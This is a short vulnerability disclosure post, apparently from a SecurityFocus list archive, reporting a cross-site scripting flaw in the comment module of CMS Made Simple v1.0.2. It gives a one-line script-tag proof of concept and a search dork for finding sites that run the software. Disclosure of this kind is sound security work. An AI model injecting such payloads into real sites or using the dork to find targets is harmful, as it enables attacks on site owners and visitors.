XSS - CMS Made Simple v1.0.2 Dec 25 2006 09:13PM
Curtis Zimmerman (curtis zimmerman gmail com)
Product: CMS Made Simple v1.0.2
Class: XSS
Website: http://www.cmsmadesimple.org
Found by: L0j1k of D.I.E. Inc.
Googledork: "powered by cms made simple"
- Summary:

Optional user comment module not properly sanitized for <script> tags.
- PoC:

Input the following into user comment form:

<script type="text/javascript">alert('XSS')</script>


More information can be found at:


Merry Christmas everyone!

[ reply ]


Privacy Statement
Copyright 2010, SecurityFocus